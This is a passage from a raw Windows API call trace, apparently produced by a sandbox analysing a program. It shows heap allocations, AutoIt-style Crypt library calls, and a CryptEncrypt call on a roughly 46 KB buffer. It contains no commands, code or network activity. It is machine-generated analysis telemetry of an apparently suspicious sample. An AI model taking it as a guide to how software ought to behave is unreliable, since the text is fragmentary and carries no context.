lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0134.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0134.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0134.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0134.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0134.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0134.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0134.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0134.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0134.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0134.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0134.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0134.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0134.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0134.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0134.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0134.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0134.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0134.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0134.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0134.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0134.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0134.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0134.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0134.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0134.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0134.224] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0134.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0134.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0134.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0134.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0134.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796fc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0134.224] CryptGetKeyParam (in: hKey=0x41ac640, dwParam=0x7, pbData=0x43e2a70, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e2a70*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0134.224] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0134.224] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0134.224] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0134.224] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0134.225] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0134.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0134.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb300, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0134.225] CryptEncrypt (in: hKey=0x41ac640, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0xb5e4, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0xb5f0) returned 1 [0134.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0134.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e8ab0 [0134.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0134.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb330 [0134.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb120 [0134.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb228 [0134.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0134.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0134.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb378 [0134.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb210 [0134.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0134.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb270 [0134.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0134.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb210 [0134.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0134.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0134.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0134.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb288 [0134.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0134.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0134.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0134.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb378 [0134.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0134.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb120 [0134.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0134.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb288 [0134.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0134.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0134.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0134.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0134.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0134.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb318 [0134.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2d0 [0134.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0134.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0134.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0134.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0134.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e8f00 [0134.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0134.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0134.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0134.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0134.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0134.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0134.226] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0134.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0134.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a90 [0134.288] TranslateMessage (lpMsg=0x144eb54) returned 0 [0134.288] DispatchMessageW (lpMsg=0x144eb54) returned 0x0 [0134.288] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0134.288] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0134.289] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0134.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0134.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0134.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0134.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0134.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb300 [0134.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0134.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0134.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0134.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0134.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0134.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0d8 [0134.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0134.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0134.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0134.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0134.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797008 [0134.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0134.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0134.289] CharLowerBuffW (in: lpsz="byte[46577]", cchLength=0xb | out: lpsz="byte[46577]") returned 0xb [0134.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0134.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2d0 [0134.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0134.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0134.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0134.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0134.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0134.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0134.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0134.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0134.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb5f1) returned 0x49cc1e0 [0134.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797088 [0134.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0134.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0134.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0134.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0134.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0134.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0134.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e88 [0134.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0134.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb300 [0134.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0134.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0134.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0134.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb198 [0134.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0134.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0134.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb5e4) returned 0x49d77e0 [0134.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0134.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb5e4) returned 0x49e2dd0 [0134.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb300 | out: hHeap=0x1780000) returned 1 [0134.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0134.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0134.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0134.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0134.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0134.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49d77e0 | out: hHeap=0x1780000) returned 1 [0134.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0134.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb198 | out: hHeap=0x1780000) returned 1 [0134.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0134.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49e2dd0 | out: hHeap=0x1780000) returned 1 [0134.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0134.291] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0134.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0134.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0134.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0134.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0134.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0134.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392378 [0134.292] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0134.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392378 | out: hHeap=0x1780000) returned 1 [0134.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0134.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb288 [0134.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0134.292] PeekMessageW (in: lpMsg=0x144e4ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4ec) returned 0 [0134.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0134.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0134.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0134.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0134.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0134.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb288 | out: hHeap=0x1780000) returned 1 [0134.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0134.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0134.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0134.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0134.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0134.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb108 [0134.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0134.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0134.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0134.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0134.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0134.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1e0 [0134.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0134.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0d8 [0134.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0134.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0134.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2d0 [0134.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0134.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb210 [0134.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0134.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb150 [0134.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0134.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0134.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0134.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0134.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0134.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0134.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0134.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0134.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb198 [0134.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0134.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0134.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb228 [0134.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0134.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb258 [0134.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0134.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb288 [0134.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0134.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0134.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0134.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0134.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2a0 [0134.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0134.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb378 [0134.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0134.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0134.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0134.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2e8 [0134.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0134.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0134.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb300 [0134.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0134.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb090 [0134.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0134.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3f0 [0134.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0134.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0134.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb4b0 [0134.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0134.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0134.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb5e4) returned 0x49d77e0 [0134.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0134.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49d77e0 | out: hHeap=0x1780000) returned 1 [0134.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0134.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb4b0 | out: hHeap=0x1780000) returned 1 [0134.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0134.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0134.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3c0 [0134.294] RtlAllocateHeap 